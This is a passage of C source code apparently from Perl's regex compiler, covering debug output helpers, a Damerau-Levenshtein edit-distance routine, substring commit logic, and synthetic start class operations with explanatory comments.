Perl_re_indentf(aTHX_ "%s: Pos:%" IVdf "/%" IVdf " Flags: 0x%" UVXf,
depth,
where,
(IV)data->pos_min,
(IV)data->pos_delta,
(UV)data->flags
);
S_debug_show_study_flags(aTHX_ data->flags," [","]");
Perl_re_printf( aTHX_
" Whilem_c: %" IVdf " Lcp: %" IVdf " %s",
(IV)data->whilem_c,
(IV)(data->last_closep ? *((data)->last_closep) : -1),
is_inf ? "INF " : ""
);
if (data->last_found) {
int i;
Perl_re_printf(aTHX_
"Last:'%s' %" IVdf ":%" IVdf "/%" IVdf,
SvPVX_const(data->last_found),
(IV)data->last_end,
(IV)data->last_start_min,
(IV)data->last_start_max
);
for (i = 0; i < 2; i++) {
Perl_re_printf(aTHX_
" %s%s: '%s' @ %" IVdf "/%" IVdf,
data->cur_is_floating == i ? "*" : "",
i ? "Float" : "Fixed",
SvPVX_const(data->substrs[i].str),
(IV)data->substrs[i].min_offset,
(IV)data->substrs[i].max_offset
);
S_debug_show_study_flags(aTHX_ data->substrs[i].flags," [","]");
}
}
Perl_re_printf( aTHX_ "\n");
});
}
static void
S_debug_peep(pTHX_ const char *str, const RExC_state_t *pRExC_state,
regnode *scan, U32 depth, U32 flags)
{
GET_RE_DEBUG_FLAGS_DECL;
DEBUG_OPTIMISE_r({
regnode *Next;
if (!scan)
return;
Next = regnext(scan);
regprop(RExC_rx, RExC_mysv, scan, NULL, pRExC_state);
Perl_re_indentf( aTHX_ "%s>%3d: %s (%d)",
depth,
str,
REG_NODE_NUM(scan), SvPV_nolen_const(RExC_mysv),
Next ? (REG_NODE_NUM(Next)) : 0 );
S_debug_show_study_flags(aTHX_ flags," [ ","]");
Perl_re_printf( aTHX_ "\n");
});
}
# define DEBUG_STUDYDATA(where, data, depth, is_inf) \
S_debug_studydata(aTHX_ where, data, depth, is_inf)
# define DEBUG_PEEP(str, scan, depth, flags) \
S_debug_peep(aTHX_ str, pRExC_state, scan, depth, flags)
#else
# define DEBUG_STUDYDATA(where, data, depth, is_inf) NOOP
# define DEBUG_PEEP(str, scan, depth, flags) NOOP
#endif
/* =========================================================
* BEGIN edit_distance stuff.
*
* This calculates how many single character changes of any type are needed to
* transform a string into another one. It is taken from version 3.1 of
*
* https://metacpan.org/pod/Text::Levenshtein::Damerau::XS
*/
/* Our unsorted dictionary linked list. */
/* Note we use UVs, not chars. */
struct dictionary{
UV key;
UV value;
struct dictionary* next;
};
typedef struct dictionary item;
PERL_STATIC_INLINE item*
push(UV key, item* curr)
{
item* head;
Newx(head, 1, item);
head->key = key;
head->value = 0;
head->next = curr;
return head;
}
PERL_STATIC_INLINE item*
find(item* head, UV key)
{
item* iterator = head;
while (iterator){
if (iterator->key == key){
return iterator;
}
iterator = iterator->next;
}
return NULL;
}
PERL_STATIC_INLINE item*
uniquePush(item* head, UV key)
{
item* iterator = head;
while (iterator){
if (iterator->key == key) {
return head;
}
iterator = iterator->next;
}
return push(key, head);
}
PERL_STATIC_INLINE void
dict_free(item* head)
{
item* iterator = head;
while (iterator) {
item* temp = iterator;
iterator = iterator->next;
Safefree(temp);
}
head = NULL;
}
/* End of Dictionary Stuff */
/* All calculations/work are done here */
STATIC int
S_edit_distance(const UV* src,
const UV* tgt,
const STRLEN x, /* length of src[] */
const STRLEN y, /* length of tgt[] */
const SSize_t maxDistance
)
{
item *head = NULL;
UV swapCount, swapScore, targetCharCount, i, j;
UV *scores;
UV score_ceil = x + y;
PERL_ARGS_ASSERT_EDIT_DISTANCE;
/* intialize matrix start values */
Newx(scores, ( (x + 2) * (y + 2)), UV);
scores[0] = score_ceil;
scores[1 * (y + 2) + 0] = score_ceil;
scores[0 * (y + 2) + 1] = score_ceil;
scores[1 * (y + 2) + 1] = 0;
head = uniquePush(uniquePush(head, src[0]), tgt[0]);
/* work loops */
/* i = src index */
/* j = tgt index */
for (i=1;i<=x;i++) {
if (i < x)
head = uniquePush(head, src[i]);
scores[(i+1) * (y + 2) + 1] = i;
scores[(i+1) * (y + 2) + 0] = score_ceil;
swapCount = 0;
for (j=1;j<=y;j++) {
if (i == 1) {
if(j < y)
head = uniquePush(head, tgt[j]);
scores[1 * (y + 2) + (j + 1)] = j;
scores[0 * (y + 2) + (j + 1)] = score_ceil;
}
targetCharCount = find(head, tgt[j-1])->value;
swapScore = scores[targetCharCount * (y + 2) + swapCount] + i - targetCharCount - 1 + j - swapCount;
if (src[i-1] != tgt[j-1]){
scores[(i+1) * (y + 2) + (j + 1)] = MIN(swapScore,(MIN(scores[i * (y + 2) + j], MIN(scores[(i+1) * (y + 2) + j], scores[i * (y + 2) + (j + 1)])) + 1));
}
else {
swapCount = j;
scores[(i+1) * (y + 2) + (j + 1)] = MIN(scores[i * (y + 2) + j], swapScore);
}
}
find(head, src[i-1])->value = i;
}
{
IV score = scores[(x+1) * (y + 2) + (y + 1)];
dict_free(head);
Safefree(scores);
return (maxDistance != 0 && maxDistance < score)?(-1):score;
}
}
/* END of edit_distance() stuff
* ========================================================= */
/* is c a control character for which we have a mnemonic? */
#define isMNEMONIC_CNTRL(c) _IS_MNEMONIC_CNTRL_ONLY_FOR_USE_BY_REGCOMP_DOT_C(c)
STATIC const char *
S_cntrl_to_mnemonic(const U8 c)
{
/* Returns the mnemonic string that represents character 'c', if one
* exists; NULL otherwise. The only ones that exist for the purposes of
* this routine are a few control characters */
switch (c) {
case '\a': return "\\a";
case '\b': return "\\b";
case ESC_NATIVE: return "\\e";
case '\f': return "\\f";
case '\n': return "\\n";
case '\r': return "\\r";
case '\t': return "\\t";
}
return NULL;
}
/* Mark that we cannot extend a found fixed substring at this point.
Update the longest found anchored substring or the longest found
floating substrings if needed. */
STATIC void
S_scan_commit(pTHX_ const RExC_state_t *pRExC_state, scan_data_t *data,
SSize_t *minlenp, int is_inf)
{
const STRLEN l = CHR_SVLEN(data->last_found);
SV * const longest_sv = data->substrs[data->cur_is_floating].str;
const STRLEN old_l = CHR_SVLEN(longest_sv);
GET_RE_DEBUG_FLAGS_DECL;
PERL_ARGS_ASSERT_SCAN_COMMIT;
if ((l >= old_l) && ((l > old_l) || (data->flags & SF_BEFORE_EOL))) {
const U8 i = data->cur_is_floating;
SvSetMagicSV(longest_sv, data->last_found);
data->substrs[i].min_offset = l ? data->last_start_min : data->pos_min;
if (!i) /* fixed */
data->substrs[0].max_offset = data->substrs[0].min_offset;
else { /* float */
data->substrs[1].max_offset = (l
? data->last_start_max
: (data->pos_delta > SSize_t_MAX - data->pos_min
? SSize_t_MAX
: data->pos_min + data->pos_delta));
if (is_inf
|| (STRLEN)data->substrs[1].max_offset > (STRLEN)SSize_t_MAX)
data->substrs[1].max_offset = SSize_t_MAX;
}
if (data->flags & SF_BEFORE_EOL)
data->substrs[i].flags |= (data->flags & SF_BEFORE_EOL);
else
data->substrs[i].flags &= ~SF_BEFORE_EOL;
data->substrs[i].minlenp = minlenp;
data->substrs[i].lookbehind = 0;
}
SvCUR_set(data->last_found, 0);
{
SV * const sv = data->last_found;
if (SvUTF8(sv) && SvMAGICAL(sv)) {
MAGIC * const mg = mg_find(sv, PERL_MAGIC_utf8);
if (mg)
mg->mg_len = 0;
}
}
data->last_end = -1;
data->flags &= ~SF_BEFORE_EOL;
DEBUG_STUDYDATA("commit", data, 0, is_inf);
}
/* An SSC is just a regnode_charclass_posix with an extra field: the inversion
* list that describes which code points it matches */
STATIC void
S_ssc_anything(pTHX_ regnode_ssc *ssc)
{
/* Set the SSC 'ssc' to match an empty string or any code point */
PERL_ARGS_ASSERT_SSC_ANYTHING;
assert(is_ANYOF_SYNTHETIC(ssc));
/* mortalize so won't leak */
ssc->invlist = sv_2mortal(_add_range_to_invlist(NULL, 0, UV_MAX));
ANYOF_FLAGS(ssc) |= SSC_MATCHES_EMPTY_STRING; /* Plus matches empty */
}
STATIC int
S_ssc_is_anything(const regnode_ssc *ssc)
{
/* Returns TRUE if the SSC 'ssc' can match the empty string and any code
* point; FALSE otherwise. Thus, this is used to see if using 'ssc' buys
* us anything: if the function returns TRUE, 'ssc' hasn't been restricted
* in any way, so there's no point in using it */
UV start, end;
bool ret;
PERL_ARGS_ASSERT_SSC_IS_ANYTHING;
assert(is_ANYOF_SYNTHETIC(ssc));
if (! (ANYOF_FLAGS(ssc) & SSC_MATCHES_EMPTY_STRING)) {
return FALSE;
}
/* See if the list consists solely of the range 0 - Infinity */
invlist_iterinit(ssc->invlist);
ret = invlist_iternext(ssc->invlist, &start, &end)
&& start == 0
&& end == UV_MAX;
invlist_iterfinish(ssc->invlist);
if (ret) {
return TRUE;
}
/* If e.g., both \w and \W are set, matches everything */
if (ANYOF_POSIXL_SSC_TEST_ANY_SET(ssc)) {
int i;
for (i = 0; i < ANYOF_POSIXL_MAX; i += 2) {
if (ANYOF_POSIXL_TEST(ssc, i) && ANYOF_POSIXL_TEST(ssc, i+1)) {
return TRUE;
}
}
}
return FALSE;
}
STATIC void
S_ssc_init(pTHX_ const RExC_state_t *pRExC_state, regnode_ssc *ssc)
{
/* Initializes the SSC 'ssc'. This includes setting it to match an empty
* string, any code point, or any posix class under locale */
PERL_ARGS_ASSERT_SSC_INIT;
Zero(ssc, 1, regnode_ssc);
set_ANYOF_SYNTHETIC(ssc);
ARG_SET(ssc, ANYOF_ONLY_HAS_BITMAP);
ssc_anything(ssc);
/* If any portion of the regex is to operate under locale rules that aren't
* fully known at compile time, initialization includes it. The reason
* this isn't done for all regexes is that the optimizer was written under
* the assumption that locale was all-or-nothing. Given the complexity and
* lack of documentation in the optimizer, and that there are inadequate
* test cases for locale, many parts of it may not work properly, it is
* safest to avoid locale unless necessary. */
if (RExC_contains_locale) {
ANYOF_POSIXL_SETALL(ssc);
}
else {
ANYOF_POSIXL_ZERO(ssc);
}
}
STATIC int
S_ssc_is_cp_posixl_init(const RExC_state_t *pRExC_state,
const regnode_ssc *ssc)
{
/* Returns TRUE if the SSC 'ssc' is in its initial state with regard only
* to the list of code points matched, and locale posix classes; hence does
* not check its flags) */
UV start, end;
bool ret;
PERL_ARGS_ASSERT_SSC_IS_CP_POSIXL_INIT;
assert(is_ANYOF_SYNTHETIC(ssc));
invlist_iterinit(ssc->invlist);
ret = invlist_iternext(ssc->invlist, &start, &end)
&& start == 0
&& end == UV_MAX;
invlist_iterfinish(ssc->invlist);
if (! ret) {
return FALSE;
}
if (RExC_contains_locale && ! ANYOF_POSIXL_SSC_TEST_ALL_SET(ssc)) {
return FALSE;
}
return TRUE;
}
#define INVLIST_INDEX 0
#define ONLY_LOCALE_MATCHES_INDEX 1
#define DEFERRED_USER_DEFINED_INDEX 2
STATIC SV*
S_get_ANYOF_cp_list_for_ssc(pTHX_ const RExC_state_t *pRExC_state,
const regnode_charclass* const node)
{
/* Returns a mortal inversion list defining which code points are matched
* by 'node', which is of type ANYOF. Handles complementing the result if
* appropriate. If some code points aren't knowable at this time, the
* returned list must, and will, contain every code point that is a
* possibility. */
dVAR;
SV* invlist = NULL;
SV* only_utf8_locale_invlist = NULL;
unsigned int i;
const U32 n = ARG(node);
bool new_node_has_latin1 = FALSE;
const U8 flags = OP(node) == ANYOFH ? 0 : ANYOF_FLAGS(node);
PERL_ARGS_ASSERT_GET_ANYOF_CP_LIST_FOR_SSC;
/* Look at the data structure created by S_set_ANYOF_arg() */
if (n != ANYOF_ONLY_HAS_BITMAP) {
SV * const rv = MUTABLE_SV(RExC_rxi->data->data[n]);
AV * const av = MUTABLE_AV(SvRV(rv));
SV **const ary = AvARRAY(av);
assert(RExC_rxi->data->what[n] == 's');
if (av_tindex_skip_len_mg(av) >= DEFERRED_USER_DEFINED_INDEX) {
/* Here there are things that won't be known until runtime -- we
* have to assume it could be anything */
invlist = sv_2mortal(_new_invlist(1));
return _add_range_to_invlist(invlist, 0, UV_MAX);
}
else if (ary[INVLIST_INDEX]) {
/* Use the node's inversion list */
invlist = sv_2mortal(invlist_clone(ary[INVLIST_INDEX], NULL));
}
/* Get the code points valid only under UTF-8 locales */
if ( (flags & ANYOFL_FOLD)
&& av_tindex_skip_len_mg(av) >= ONLY_LOCALE_MATCHES_INDEX)
{
only_utf8_locale_invlist = ary[ONLY_LOCALE_MATCHES_INDEX];
}
}
if (! invlist) {
invlist = sv_2mortal(_new_invlist(0));
}
/* An ANYOF node contains a bitmap for the first NUM_ANYOF_CODE_POINTS
* code points, and an inversion list for the others, but if there are code
* points that should match only conditionally on the target string being
* UTF-8, those are placed in the inversion list, and not the bitmap.
* Since there are circumstances under which they could match, they are
* included in the SSC. But if the ANYOF node is to be inverted, we have
* to exclude them here, so that when we invert below, the end result
* actually does include them. (Think about "\xe0" =~ /[^\xc0]/di;). We
* have to do this here before we add the unconditionally matched code
* points */
if (flags & ANYOF_INVERT) {
_invlist_intersection_complement_2nd(invlist,
PL_UpperLatin1,
&invlist);
}
/* Add in the points from the bit map */
if (OP(node) != ANYOFH) {
for (i = 0; i < NUM_ANYOF_CODE_POINTS; i++) {
if (ANYOF_BITMAP_TEST(node, i)) {
unsigned int start = i++;
for (; i < NUM_ANYOF_CODE_POINTS
&& ANYOF_BITMAP_TEST(node, i); ++i)
{
/* empty */
}
invlist = _add_range_to_invlist(invlist, start, i-1);
new_node_has_latin1 = TRUE;
}
}
}
/* If this can match all upper Latin1 code points, have to add them
* as well. But don't add them if inverting, as when that gets done below,
* it would exclude all these characters, including the ones it shouldn't
* that were added just above */
if (! (flags & ANYOF_INVERT) && OP(node) == ANYOFD
&& (flags & ANYOF_SHARED_d_MATCHES_ALL_NON_UTF8_NON_ASCII_non_d_WARN_SUPER))
{
_invlist_union(invlist, PL_UpperLatin1, &invlist);
}
/* Similarly for these */
if (flags & ANYOF_MATCHES_ALL_ABOVE_BITMAP) {
_invlist_union_complement_2nd(invlist, PL_InBitmap, &invlist);
}
if (flags & ANYOF_INVERT) {
_invlist_invert(invlist);
}
else if (flags & ANYOFL_FOLD) {
if (new_node_has_latin1) {
/* Under /li, any 0-255 could fold to any other 0-255, depending on
* the locale. We can skip this if there are no 0-255 at all. */
_invlist_union(invlist, PL_Latin1, &invlist);
invlist = add_cp_to_invlist(invlist, LATIN_SMALL_LETTER_DOTLESS_I);
invlist = add_cp_to_invlist(invlist, LATIN_CAPITAL_LETTER_I_WITH_DOT_ABOVE);
}
else {
if (_invlist_contains_cp(invlist, LATIN_SMALL_LETTER_DOTLESS_I)) {
invlist = add_cp_to_invlist(invlist, 'I');
}
if (_invlist_contains_cp(invlist,
LATIN_CAPITAL_LETTER_I_WITH_DOT_ABOVE))
{
invlist = add_cp_to_invlist(invlist, 'i');
}
}
}
/* Similarly add the UTF-8 locale possible matches. These have to be
* deferred until after the non-UTF-8 locale ones are taken care of just
* above, or it leads to wrong results under ANYOF_INVERT */
if (only_utf8_locale_invlist) {
_invlist_union_maybe_complement_2nd(invlist,
only_utf8_locale_invlist,
flags & ANYOF_INVERT,
&invlist);
}
return invlist;
}
/* These two functions currently do the exact same thing */
#define ssc_init_zero ssc_init
#define ssc_add_cp(ssc, cp) ssc_add_range((ssc), (cp), (cp))
#define ssc_match_all_cp(ssc) ssc_add_range(ssc, 0, UV_MAX)
/* 'AND' a given class with another one. Can create false positives. 'ssc'
* should not be inverted. 'and_with->flags & ANYOF_MATCHES_POSIXL' should be
* 0 if 'and_with' is a regnode_charclass instead of a regnode_ssc. */
STATIC void
S_ssc_and(pTHX_ const RExC_state_t *pRExC_state, regnode_ssc *ssc,
const regnode_charclass *and_with)
{
/* Accumulate into SSC 'ssc' its 'AND' with 'and_with', which is either
* another SSC or a regular ANYOF class. Can create false positives. */
SV* anded_cp_list;
U8 and_with_flags = (OP(and_with) == ANYOFH) ? 0 : ANYOF_FLAGS(and_with);
U8 anded_flags;
PERL_ARGS_ASSERT_SSC_AND;
assert(is_ANYOF_SYNTHETIC(ssc));
/* 'and_with' is used as-is if it too is an SSC; otherwise have to extract
* the code point inversion list and just the relevant flags */
if (is_ANYOF_SYNTHETIC(and_with)) {
anded_cp_list = ((regnode_ssc *)and_with)->invlist;
anded_flags = and_with_flags;
/* XXX This is a kludge around what appears to be deficiencies in the
* optimizer. If we make S_ssc_anything() add in the WARN_SUPER flag,
* there are paths through the optimizer where it doesn't get weeded
* out when it should. And if we don't make some extra provision for
* it like the code just below, it doesn't get added when it should.
* This solution is to add it only when AND'ing, which is here, and
* only when what is being AND'ed is the pristine, original node
* matching anything. Thus it is like adding it to ssc_anything() but
* only when the result is to be AND'ed. Probably the same solution
* could be adopted for the same problem we have with /l matching,
* which is solved differently in S_ssc_init(), and that would lead to
* fewer false positives than that solution has. But if this solution
* creates bugs, the consequences are only that a warning isn't raised
* that should be; while the consequences for having /l bugs is
* incorrect matches */
if (ssc_is_anything((regnode_ssc *)and_with)) {
anded_flags |= ANYOF_SHARED_d_MATCHES_ALL_NON_UTF8_NON_ASCII_non_d_WARN_SUPER;
}
}
else {
anded_cp_list = get_ANYOF_cp_list_for_ssc(pRExC_state, and_with);
if (OP(and_with) == ANYOFD) {
anded_flags = and_with_flags & ANYOF_COMMON_FLAGS;
}
else {
anded_flags = and_with_flags
&( ANYOF_COMMON_FLAGS
|ANYOF_SHARED_d_MATCHES_ALL_NON_UTF8_NON_ASCII_non_d_WARN_SUPER
|ANYOF_SHARED_d_UPPER_LATIN1_UTF8_STRING_MATCHES_non_d_RUNTIME_USER_PROP);
if (ANYOFL_UTF8_LOCALE_REQD(and_with_flags)) {
anded_flags &=
ANYOFL_SHARED_UTF8_LOCALE_fold_HAS_MATCHES_nonfold_REQD;
}
}
}
ANYOF_FLAGS(ssc) &= anded_flags;
/* Below, C1 is the list of code points in 'ssc'; P1, its posix classes.
* C2 is the list of code points in 'and-with'; P2, its posix classes.
* 'and_with' may be inverted. When not inverted, we have the situation of
* computing:
* (C1 | P1) & (C2 | P2)
* = (C1 & (C2 | P2)) | (P1 & (C2 | P2))
* = ((C1 & C2) | (C1 & P2)) | ((P1 & C2) | (P1 & P2))
* <= ((C1 & C2) | P2)) | ( P1 | (P1 & P2))
* <= ((C1 & C2) | P1 | P2)
* Alternatively, the last few steps could be:
* = ((C1 & C2) | (C1 & P2)) | ((P1 & C2) | (P1 & P2))
* <= ((C1 & C2) | C1 ) | ( C2 | (P1 & P2))
* <= (C1 | C2 | (P1 & P2))
* We favor the second approach if either P1 or P2 is non-empty. This is
* because these components are a barrier to doing optimizations, as what
* they match cannot be known until the moment of matching as they are
* dependent on the current locale, 'AND"ing them likely will reduce or
* eliminate them.
* But we can do better if we know that C1,P1 are in their initial state (a
* frequent occurrence), each matching everything:
* (<everything>) & (C2 | P2) = C2 | P2
* Similarly, if C2,P2 are in their initial state (again a frequent
* occurrence), the result is a no-op
* (C1 | P1) & (<everything>) = C1 | P1
*
* Inverted, we have
* (C1 | P1) & ~(C2 | P2) = (C1 | P1) & (~C2 & ~P2)
* = (C1 & (~C2 & ~P2)) | (P1 & (~C2 & ~P2))
* <= (C1 & ~C2) | (P1 & ~P2)
* */
if ((and_with_flags & ANYOF_INVERT)
&& ! is_ANYOF_SYNTHETIC(and_with))
{
unsigned int i;
ssc_intersection(ssc,
anded_cp_list,
FALSE /* Has already been inverted */
);
/* If either P1 or P2 is empty, the intersection will be also; can skip
* the loop */
if (! (and_with_flags & ANYOF_MATCHES_POSIXL)) {
ANYOF_POSIXL_ZERO(ssc);
}
else if (ANYOF_POSIXL_SSC_TEST_ANY_SET(ssc)) {
/* Note that the Posix class component P from 'and_with' actually
* looks like:
* P = Pa | Pb | ... | Pn
* where each component is one posix class, such as in [\w\s].
* Thus
* ~P = ~(Pa | Pb | ... | Pn)
* = ~Pa & ~Pb & ... & ~Pn
* <= ~Pa | ~Pb | ... | ~Pn
* The last is something we can easily calculate, but unfortunately
* is likely to have many false positives. We could do better
* in some (but certainly not all) instances if two classes in
* P have known relationships. For example
* :lower: <= :alpha: <= :alnum: <= \w <= :graph: <= :print:
* So
* :lower: & :print: = :lower:
* And similarly for classes that must be disjoint. For example,
* since \s and \w can have no elements in common based on rules in
* the POSIX standard,
* \w & ^\S = nothing
* Unfortunately, some vendor locales do not meet the Posix
* standard, in particular almost everything by Microsoft.
* The loop below just changes e.g., \w into \W and vice versa */
regnode_charclass_posixl temp;
int add = 1; /* To calculate the index of the complement */
Zero(&temp, 1, regnode_charclass_posixl);
ANYOF_POSIXL_ZERO(&temp);
for (i = 0; i < ANYOF_MAX; i++) {
assert(i % 2 != 0
|| ! ANYOF_POSIXL_TEST((regnode_charclass_posixl*) and_with, i)
|| ! ANYOF_POSIXL_TEST((regnode_charclass_posixl*) and_with, i + 1));
if (ANYOF_POSIXL_TEST((regnode_charclass_posixl*) and_with, i)) {
ANYOF_POSIXL_SET(&temp, i + add);
}
add = 0 - add; /* 1 goes to -1; -1 goes to 1 */
}
ANYOF_POSIXL_AND(&temp, ssc);
} /* else ssc already has no posixes */
} /* else: Not inverted. This routine is a no-op if 'and_with' is an SSC
in its initial state */
else if (! is_ANYOF_SYNTHETIC(and_with)
|| ! ssc_is_cp_posixl_init(pRExC_state, (regnode_ssc *)and_with))
{
/* But if 'ssc' is in its initial state, the result is just 'and_with';
* copy it over 'ssc' */
if (ssc_is_cp_posixl_init(pRExC_state, ssc)) {
if (is_ANYOF_SYNTHETIC(and_with)) {
StructCopy(and_with, ssc, regnode_ssc);
}
else {
ssc->invlist = anded_cp_list;
ANYOF_POSIXL_ZERO(ssc);
if (and_with_flags & ANYOF_MATCHES_POSIXL) {
ANYOF_POSIXL_OR((regnode_charclass_posixl*) and_with, ssc);
}
}
}
else if (ANYOF_POSIXL_SSC_TEST_ANY_SET(ssc)
|| (and_with_flags & ANYOF_MATCHES_POSIXL))
{
/* One or the other of P1, P2 is non-empty. */
if (and_with_flags & ANYOF_MATCHES_POSIXL) {
ANYOF_POSIXL_AND((regnode_charclass_posixl*) and_with, ssc);
}
ssc_union(ssc, anded_cp_list, FALSE);
}
else { /* P1 = P2 = empty */
ssc_intersection(ssc, anded_cp_list, FALSE);
}
}
}
STATIC void
S_ssc_or(pTHX_ const RExC_state_t *pRExC_state, regnode_ssc *ssc,
const regnode_charclass *or_with)
{
/* Accumulate into SSC 'ssc' its 'OR' with 'or_with', which is either
* another SSC or a regular ANYOF class. Can create false positives if
* 'or_with' is to be inverted. */
SV* ored_cp_list;
U8 ored_flags;
U8 or_with_flags = (OP(or_with) == ANYOFH) ? 0 : ANYOF_FLAGS(or_with);
PERL_ARGS_ASSERT_SSC_OR;
assert(is_ANYOF_SYNTHETIC(ssc));
/* 'or_with' is used as-is if it too is an SSC; otherwise have to extract
* the code point inversion list and just the relevant flags */
if (is_ANYOF_SYNTHETIC(or_with)) {
ored_cp_list = ((regnode_ssc*) or_with)->invlist;
ored_flags = or_with_flags;
}
else {
ored_cp_list = get_ANYOF_cp_list_for_ssc(pRExC_state, or_with);
ored_flags = or_with_flags & ANYOF_COMMON_FLAGS;
if (OP(or_with) != ANYOFD) {
ored_flags
|= or_with_flags
& ( ANYOF_SHARED_d_MATCHES_ALL_NON_UTF8_NON_ASCII_non_d_WARN_SUPER
|ANYOF_SHARED_d_UPPER_LATIN1_UTF8_STRING_MATCHES_non_d_RUNTIME_USER_PROP);
if (ANYOFL_UTF8_LOCALE_REQD(or_with_flags)) {
ored_flags |=
ANYOFL_SHARED_UTF8_LOCALE_fold_HAS_MATCHES_nonfold_REQD;
}
}
}
ANYOF_FLAGS(ssc) |= ored_flags;
/* Below, C1 is the list of code points in 'ssc'; P1, its posix classes.
* C2 is the list of code points in 'or-with'; P2, its posix classes.
* 'or_with' may be inverted. When not inverted, we have the simple
* situation of computing:
* (C1 | P1) | (C2 | P2) = (C1 | C2) | (P1 | P2)
* If P1|P2 yields a situation with both a class and its complement are
* set, like having both \w and \W, this matches all code points, and we
* can delete these from the P component of the ssc going forward. XXX We
* might be able to delete all the P components, but I (khw) am not certain
* about this, and it is better to be safe.
*
* Inverted, we have
* (C1 | P1) | ~(C2 | P2) = (C1 | P1) | (~C2 & ~P2)
* <= (C1 | P1) | ~C2
* <= (C1 | ~C2) | P1
* (which results in actually simpler code than the non-inverted case)
* */
if ((or_with_flags & ANYOF_INVERT)
&& ! is_ANYOF_SYNTHETIC(or_with))
{
/* We ignore P2, leaving P1 going forward */
} /* else Not inverted */
else if (or_with_flags & ANYOF_MATCHES_POSIXL) {
ANYOF_POSIXL_OR((regnode_charclass_posixl*)or_with, ssc);
if (ANYOF_POSIXL_SSC_TEST_ANY_SET(ssc)) {
unsigned int i;
for (i = 0; i < ANYOF_MAX; i += 2) {
if (ANYOF_POSIXL_TEST(ssc, i) && ANYOF_POSIXL_TEST(ssc, i + 1))
{
ssc_match_all_cp(ssc);
ANYOF_POSIXL_CLEAR(ssc, i);
ANYOF_POSIXL_CLEAR(ssc, i+1);
}
}
}
}
ssc_union(ssc,
ored_cp_list,
FALSE /* Already has been inverted */
);
}
PERL_STATIC_INLINE void
S_ssc_union(pTHX_ regnode_ssc *ssc, SV* const invlist, const bool invert2nd)
{
PERL_ARGS_ASSERT_SSC_UNION;
assert(is_ANYOF_SYNTHETIC(ssc));
_invlist_union_maybe_complement_2nd(ssc->invlist,
invlist,
invert2nd,
&ssc->invlist);
}
PERL_STATIC_INLINE void
S_ssc_intersection(pTHX_ regnode_ssc *ssc,
SV* const invlist,
const bool invert2nd)
{
PERL_ARGS_ASSERT_SSC_INTERSECTION;
assert(is_ANYOF_SYNTHETIC(ssc));
_invlist_intersection_maybe_complement_2nd(ssc->invlist,
invlist,
invert2nd,
&ssc->invlist);
}
PERL_STATIC_INLINE void
S_ssc_add_range(pTHX_ regnode_ssc *ssc, const UV start, const UV end)
{
PERL_ARGS_ASSERT_SSC_ADD_RANGE;
assert(is_ANYOF_SYNTHETIC(ssc));
ssc->invlist = _add_range_to_invlist(ssc->invlist, start, end);
}
PERL_STATIC_INLINE void
S_ssc_cp_and(pTHX_ regnode_ssc *ssc, const UV cp)
{
/* AND just the single code point 'cp' into the SSC 'ssc' */
SV* cp_list = _new_invlist(2);
PERL_ARGS_ASSERT_SSC_CP_AND;
assert(is_ANYOF_SYNTHETIC(ssc));
cp_list = add_cp_to_invlist(cp_list, cp);
ssc_intersection(ssc, cp_list,
FALSE /* Not inverted */
);
SvREFCNT_dec_NN(cp_list);
}
PERL_STATIC_INLINE void
S_ssc_clear_locale(regnode_ssc *ssc)
{
/* Set the SSC 'ssc' to not match any locale things */
PERL_ARGS_ASSERT_SSC_CLEAR_LOCALE;
assert(is_ANYOF_SYNTHETIC(ssc));
ANYOF_POSIXL_ZERO(ssc);
ANYOF_FLAGS(ssc) &= ~ANYOF_LOCALE_FLAGS;
}
#define NON_OTHER_COUNT NON_OTHER_COUNT_FOR_USE_ONLY_BY_REGCOMP_DOT_C
STATIC bool
S_is_ssc_worth_it(const RExC_state_t * pRExC_state, const regnode_ssc * ssc)
{
/* The synthetic start class is used to hopefully quickly winnow down
* places where a pattern could start a match in the target string. If it
* doesn't really narrow things down that much, there isn't much point to
* having the overhead of using it. This function uses some very crude
* heuristics to decide if to use the ssc or not.
*
* It returns TRUE if 'ssc' rules out more than half what it considers to
* be the "likely" possible matches, but of course it doesn't know what the
* actual things being matched are going to be; these are only guesses
*
* For /l matches, it assumes that the only likely matches are going to be
* in the 0-255 range, uniformly distributed, so half of that is 127
* For /a and /d matches, it assumes that the likely matches will be just
* the ASCII range, so half of that is 63
* For /u and there isn't anything matching above the Latin1 range, it
* assumes that that is the only range likely to be matched, and uses
* half that as the cut-off: 127. If anything matches above Latin1,
* it assumes that all of Unicode could match (uniformly), except for
* non-Unicode code points and things in the General Category "Other"
* (unassigned, private use, surrogates, controls and formats). This
* is a much large number. */
U32 count = 0; /* Running total of number of code points matched by
'ssc' */
UV start, end; /* Start and end points of current range in inversion
XXX outdated. UTF-8 locales are common, what about invert? list */
const U32 max_code_points = (LOC)
? 256
: (( ! UNI_SEMANTICS
|| invlist_highest(ssc->invlist) < 256)
? 128
: NON_OTHER_COUNT);
const U32 max_match = max_code_points / 2;
PERL_ARGS_ASSERT_IS_SSC_WORTH_IT;
invlist_iterinit(ssc->invlist);
while (invlist_iternext(ssc->invlist, &start, &end)) {
if (start >= max_code_points) {
break;
}
end = MIN(end, max_code_points - 1);
count += end - start + 1;
if (count >= max_match) {
invlist_iterfinish(ssc->invlist);
return FALSE;
}
}
return TRUE;
}
STATIC void
S_ssc_finalize(pTHX_ RExC_state_t *pRExC_state, regnode_ssc *ssc)
{
/* The inversion list in the SSC is marked mortal; now we need a more
* permanent copy, which is stored the same way that is done in a regular
* ANYOF node, with the first NUM_ANYOF_CODE_POINTS code points in a bit
* map */
SV* invlist = invlist_clone(ssc->invlist, NULL);
PERL_ARGS_ASSERT_SSC_FINALIZE;
assert(is_ANYOF_SYNTHETIC(ssc));
/* The code in this file assumes that all but these flags aren't relevant
* to the SSC, except SSC_MATCHES_EMPTY_STRING, which should be cleared
* by the time we reach here */
assert(! (ANYOF_FLAGS(ssc)
& ~( ANYOF_COMMON_FLAGS
|ANYOF_SHARED_d_MATCHES_ALL_NON_UTF8_NON_ASCII_non_d_WARN_SUPER
|ANYOF_SHARED_d_UPPER_LATIN1_UTF8_STRING_MATCHES_non_d_RUNTIME_USER_PROP)));
populate_ANYOF_from_invlist( (regnode *) ssc, &invlist);
set_ANYOF_arg(pRExC_state, (regnode *) ssc, invlist, NULL, NULL);
/* Make sure is clone-safe */
ssc->invlist = NULL;
if (ANYOF_POSIXL_SSC_TEST_ANY_SET(ssc)) {
ANYOF_FLAGS(ssc) |= ANYOF_MATCHES_POSIXL;
OP(ssc) = ANYOFPOSIXL;
}
else if (RExC_contains_locale) {
OP(ssc) = ANYOFL;
}
assert(! (ANYOF_FLAGS(ssc) & ANYOF_LOCALE_FLAGS) || RExC_contains_locale);
}
